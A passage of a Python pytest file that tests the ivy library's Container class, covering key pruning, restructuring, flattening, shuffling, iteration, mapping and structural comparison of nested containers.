assert _test_bc_exception(container_pruned)
container_pruned = container.prune_keys(["a", "d"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.c), np.array([[2]]))
assert "d" not in container_pruned["b"]
assert _test_a_exception(container_pruned)
assert _test_bd_exception(container_pruned)
def test_container_prune_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": None},
}
container = Container(dict_in)
container_pruned = container.prune_key_chain("b/c")
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert container_pruned["b"]["d"] is None
assert container_pruned.b.d is None
assert "c" not in container_pruned["b"].keys()
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
container_pruned = container.prune_key_chain("b")
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert "b" not in container_pruned.keys()
def _test_exception(container_in):
try:
_ = container_in.b
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_chains(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_key_chains(["a", "b/c"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_key_chains(
Container({"a": True, "b": {"c": True}})
)
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
def test_container_format_key_chains(device, call):
dict_in = {
"_a": ivy.array([1], device=device),
"b ": {"c": ivy.array([2], device=device), "d-": ivy.array([3], device=device)},
}
cont = Container(dict_in)
cont_formatted = cont.format_key_chains(
lambda s: s.replace("_", "").replace(" ", "").replace("-", "")
)
assert np.allclose(ivy.to_numpy(cont_formatted["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted.a), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.d), np.array([3]))
def test_container_sort_by_key(device, call):
dict_in = {
"b": ivy.array([1], device=device),
"a": {"d": ivy.array([2], device=device), "c": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_sorted = container.sort_by_key()
for k, k_true in zip(container_sorted.keys(), ["a", "b"]):
assert k == k_true
for k, k_true in zip(container_sorted.a.keys(), ["c", "d"]):
assert k == k_true
def test_container_prune_empty(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": {}, "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_empty()
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_from_key_chains(device, call):
container = Container(
{
"Ayy": ivy.array([1], device=device),
"Bee": {
"Cee": ivy.array([2], device=device),
"Dee": ivy.array([3], device=device),
},
"Beh": {
"Ceh": ivy.array([4], device=device),
"Deh": ivy.array([5], device=device),
},
}
)
# absolute
container_pruned = container.prune_key_from_key_chains("Bee")
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert "Bee" not in container_pruned
# containing
container_pruned = container.prune_key_from_key_chains(containing="B")
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Ceh"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ceh), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned["Deh"]), np.array([[5]]))
assert np.allclose(ivy.to_numpy(container_pruned.Deh), np.array([[5]]))
assert "Bee" not in container_pruned
assert "Beh" not in container_pruned
def test_container_prune_keys_from_key_chains(device, call):
container = Container(
{
"Ayy": ivy.array([1], device=device),
"Bee": {
"Cee": ivy.array([2], device=device),
"Dee": ivy.array([3], device=device),
},
"Eee": {"Fff": ivy.array([4], device=device)},
}
)
# absolute
container_pruned = container.prune_keys_from_key_chains(["Bee", "Eee"])
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Fff"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert "Bee" not in container_pruned
assert "Eee" not in container_pruned
# containing
container_pruned = container.prune_keys_from_key_chains(containing=["B", "E"])
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Fff"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert "Bee" not in container_pruned
assert "Eee" not in container_pruned
def test_container_restructure_key_chains(device, call):
# single
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_restructured = container.restructure_key_chains({"a": "A"})
assert np.allclose(ivy.to_numpy(container_restructured["A"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured["b/c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured["b/d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.d), np.array([[3]]))
# full
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_restructured = container.restructure_key_chains(
{"a": "A", "b/c": "B/C", "b/d": "B/D"}
)
assert np.allclose(ivy.to_numpy(container_restructured["A"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured["B/C"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured["B/D"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[3]]))
def test_container_restructure(device, call):
container = Container(
{
"a": ivy.array([[1, 2], [3, 4]], device=device),
"b": {
"c": ivy.array([[2, 4], [6, 8]], device=device),
"d": ivy.array([3, 6, 9, 12], device=device),
},
}
)
container_restructured = container.restructure(
{
"a": {"key_chain": "A", "pattern": "a b -> b a"},
"b/c": {"key_chain": "B/C", "pattern": "a b -> (a b)"},
"b/d": {
"key_chain": "B/D",
"pattern": "(a b) -> a b",
"axes_lengths": {"a": 2, "b": 2},
},
},
keep_orig=False,
)
assert np.allclose(
ivy.to_numpy(container_restructured["A"]), np.array([[1, 3], [2, 4]])
)
assert np.allclose(
ivy.to_numpy(container_restructured.A), np.array([[1, 3], [2, 4]])
)
assert np.allclose(
ivy.to_numpy(container_restructured["B/C"]), np.array([2, 4, 6, 8])
)
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([2, 4, 6, 8]))
assert np.allclose(
ivy.to_numpy(container_restructured["B/D"]), np.array([[3, 6], [9, 12]])
)
assert np.allclose(
ivy.to_numpy(container_restructured.B.D), np.array([[3, 6], [9, 12]])
)
def test_container_flatten_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": {"d": ivy.array([2], device=device)},
"e": {"f": {"g": ivy.array([3], device=device)}},
},
}
)
# full
container_flat = container.flatten_key_chains()
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b__c__d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b__e__f__g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f__g), np.array([[3]]))
# above height 1
container_flat = container.flatten_key_chains(above_height=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b__c"]["d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b__e__f"]["g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f.g), np.array([[3]]))
# below depth 1
container_flat = container.flatten_key_chains(below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["c__d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["e__f__g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f__g), np.array([[3]]))
# above height 1, below depth 1
container_flat = container.flatten_key_chains(above_height=1, below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["c"]["d"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat["b"]["e__f"]["g"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f.g), np.array([[3]]))
def test_container_deep_copy(device, call):
dict_in = {
"a": ivy.array([0.0], device=device),
"b": {
"c": ivy.array([1.0], device=device),
"d": ivy.array([2.0], device=device),
},
}
cont = Container(dict_in)
cont_deepcopy = cont.deep_copy()
assert np.allclose(ivy.to_numpy(cont.a), ivy.to_numpy(cont_deepcopy.a))
assert np.allclose(ivy.to_numpy(cont.b.c), ivy.to_numpy(cont_deepcopy.b.c))
assert np.allclose(ivy.to_numpy(cont.b.d), ivy.to_numpy(cont_deepcopy.b.d))
assert id(cont.a) != id(cont_deepcopy.a)
assert id(cont.b.c) != id(cont_deepcopy.b.c)
assert id(cont.b.d) != id(cont_deepcopy.b.d)
def test_container_contains(device, call):
arr0 = ivy.array([0.0], device=device)
arr1 = ivy.array([1.0], device=device)
arr2 = ivy.array([2.0], device=device)
sub_cont = Container({"c": arr1, "d": arr2})
container = Container({"a": arr0, "b": sub_cont})
# keys
assert "a" in container
assert "b" in container
assert "c" not in container
assert "b/c" in container
assert "d" not in container
assert "b/d" in container
# sub-container
assert container.contains_sub_container(container)
assert container.contains_sub_container(sub_cont)
assert sub_cont in container
# partial sub-container
partial_sub_cont = Container({"b": {"d": arr2}})
assert container.contains_sub_container(container, partial=True)
assert container.contains_sub_container(partial_sub_cont, partial=True)
assert not partial_sub_cont.contains_sub_container(container, partial=True)
# sub-structure
sub_struc = Container(
{"c": ivy.array([3.0], device=device), "d": ivy.array([4.0], device=device)}
)
assert not container.contains_sub_container(sub_struc)
assert sub_struc not in container
assert container.contains_sub_structure(sub_struc)
assert container.contains_sub_structure(container)
# partial sub-structure
partial_sub_struc = Container({"b": {"d": ivy.array([4.0], device=device)}})
assert container.contains_sub_structure(container, partial=True)
assert container.contains_sub_structure(partial_sub_struc, partial=True)
assert not partial_sub_struc.contains_sub_structure(container, partial=True)
def test_container_shuffle(device, call):
if call is helpers.tf_graph_call:
# tf.random.set_seed is not compiled. The shuffle is then not
# aligned between container items.
pytest.skip()
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": {
"c": ivy.array([1, 2, 3], device=device),
"d": ivy.array([1, 2, 3], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_shuffled = container.shuffle(0)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == shuffled_data).all()
# with key_chains to apply
container_shuffled = container.shuffle(0, ["a", "b/c"])
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to apply pruned
container_shuffled = container.shuffle(0, ["a", "b/c"], prune_unapplied=True)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert "b/d" not in container_shuffled
# with key_chains to not apply pruned
container_shuffled = container.shuffle(
0, Container({"a": None, "b": {"d": None}}), to_apply=False
)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.a) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to not apply pruned
container_shuffled = container.shuffle(
0,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert "a" not in container_shuffled
assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert "b/d" not in container_shuffled
# map sequences
dict_in = {
"a": ivy.array([1, 2, 3], device=device),
"b": [ivy.array([1, 2, 3], device=device), ivy.array([1, 2, 3], device=device)],
}
container = Container(dict_in)
container_shuffled = container.shuffle(0, map_sequences=True)
data = ivy.array([1, 2, 3], device=device)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"][0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled["b"][1]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[1]) == shuffled_data).all()
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator(include_empty=include_empty)
for (key_chain, value), expected in zip(
container_iterator, [("a", a_val), ("b/c", bc_val), ("b/d", bd_val)]
):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
# with leaf keys
container_iterator = container.to_iterator(
leaf_keys_only=True, include_empty=include_empty
)
for (key_chain, value), expected in zip(
container_iterator, [("a", a_val), ("c", bc_val), ("d", bd_val)]
):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_values(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_values(include_empty=include_empty)
for value, expected_value in zip(container_iterator, [a_val, bc_val, bd_val]):
assert value is expected_value
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_keys(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_keys(include_empty=include_empty)
for key_chain, expected_key_chain in zip(container_iterator, ["a", "b/c", "b/d"]):
assert key_chain == expected_key_chain
# with leaf keys
container_iterator = container.to_iterator_keys(
leaf_keys_only=True, include_empty=include_empty
)
for key, expected_key in zip(container_iterator, ["a", "c", "d"]):
assert key == expected_key
def test_container_to_flat_list(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_flat_list = container.to_flat_list()
for value, expected_value in zip(
container_flat_list,
[
ivy.array([1], device=device),
ivy.array([2], device=device),
ivy.array([3], device=device),
],
):
assert value == expected_value
def test_container_from_flat_list(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
flat_list = [4, 5, 6]
container = container.from_flat_list(flat_list)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map(inplace, device, call):
# without key_chains specification
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace)
if inplace:
container_iterator = container.to_iterator()
else:
container_iterator = container_mapped.to_iterator()
for (key, value), expected_value in zip(
container_iterator,
[
ivy.array([2], device=device),
ivy.array([3], device=device),
ivy.array([4], device=device),
],
):
assert call(lambda x: x, value) == call(lambda x: x, expected_value)
# with key_chains to apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ["a", "b/c"], inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1, ["a", "b/c"], prune_unapplied=True, inplace=inplace
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert "b/d" not in container_mapped
# with key_chains to not apply
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
inplace=inplace,
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to not apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
inplace=inplace,
)
if inplace:
container_mapped = container
if not inplace:
assert "a" not in container_mapped
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert "b/d" not in container_mapped
# with sequences
container_orig = Container(
{
"a": ivy.array([1], device=device),
"b": [ivy.array([2], device=device), ivy.array([3], device=device)],
}
)
container = container_orig.deep_copy()
container_mapped = container.map(
lambda x, _: x + 1, inplace=inplace, map_sequences=True
)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_mapped["b"][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_mapped["b"][1]), np.array([4]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map_conts(inplace, device, call):
# without key_chains specification
container_orig = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
def _add_e_attr(cont_in):
cont_in.e = ivy.array([4], device=device)
return cont_in
# with self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), inplace=inplace)
if inplace:
container_mapped = container
assert "e" in container_mapped
assert np.array_equal(ivy.to_numpy(container_mapped.e), np.array([4]))
assert "e" in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
# without self
container = container_orig.deep_copy()
container_mapped = container.map_conts(
lambda c, _: _add_e_attr(c), include_self=False, inplace=inplace
)
if inplace:
container_mapped = container
assert "e" not in container_mapped
assert "e" in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
def test_container_multi_map(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
}
)
# with key_chains to apply
container_mapped = ivy.Container.multi_map(
lambda x, _: x[0] + x[1], [container0, container1]
)
assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[8]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[8]]))
def test_container_common_key_chains(device, call):
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
cont0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
cont1 = Container({"b": {"c": arr2, "d": arr3, "e": arr1}})
cont2 = Container({"a": arr1, "b": {"d": arr3, "e": arr1}})
# 0
common_kcs = Container.common_key_chains([cont0])
assert len(common_kcs) == 3
assert "a" in common_kcs
assert "b/c" in common_kcs
assert "b/d" in common_kcs
# 0-1
common_kcs = Container.common_key_chains([cont0, cont1])
assert len(common_kcs) == 2
assert "b/c" in common_kcs
assert "b/d" in common_kcs
# 0-2
common_kcs = Container.common_key_chains([cont0, cont2])
assert len(common_kcs) == 2
assert "a" in common_kcs
assert "b/d" in common_kcs
# 1-2
common_kcs = Container.common_key_chains([cont1, cont2])
assert len(common_kcs) == 2
assert "b/d" in common_kcs
assert "b/e" in common_kcs
# all
common_kcs = Container.common_key_chains([cont0, cont1, cont2])
assert len(common_kcs) == 1
assert "b/d" in common_kcs
def test_container_identical(device, call):
# without key_chains specification
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
container0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
container1 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
container2 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container3 = Container({"b": {"d": arr3}})
container4 = Container({"d": arr3})
# the same
assert ivy.Container.identical([container0, container1])
assert ivy.Container.identical([container1, container0])
# not the same
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container2, container0])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container2, container1])
# partial
assert ivy.Container.identical([container0, container3], partial=True)
assert ivy.Container.identical([container3, container0], partial=True)
assert not ivy.Container.identical([container0, container4], partial=True)
assert not ivy.Container.identical([container4, container0], partial=True)
def test_container_identical_structure(device, call):
# without key_chains specification
container0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container1 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
}
)
container2 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container3 = Container(
{
"a": ivy.array([3], device=device),
"b": {
"c": ivy.array([4], device=device),
"d": ivy.array([5], device=device),
},
"e": ivy.array([6], device=device),
}
)
container4 = Container({"b": {"d": ivy.array([4], device=device)}})
container5 = Container({"d": ivy.array([4], device=device)})
# with identical
assert ivy.Container.identical_structure([container0, container1])
assert ivy.Container.identical_structure([container1, container0])
assert ivy.Container.identical_structure([container1, container0, container1])
# without identical
assert not ivy.Container.identical_structure([container2, container3])
assert not ivy.Container.identical_structure([container0, container3])
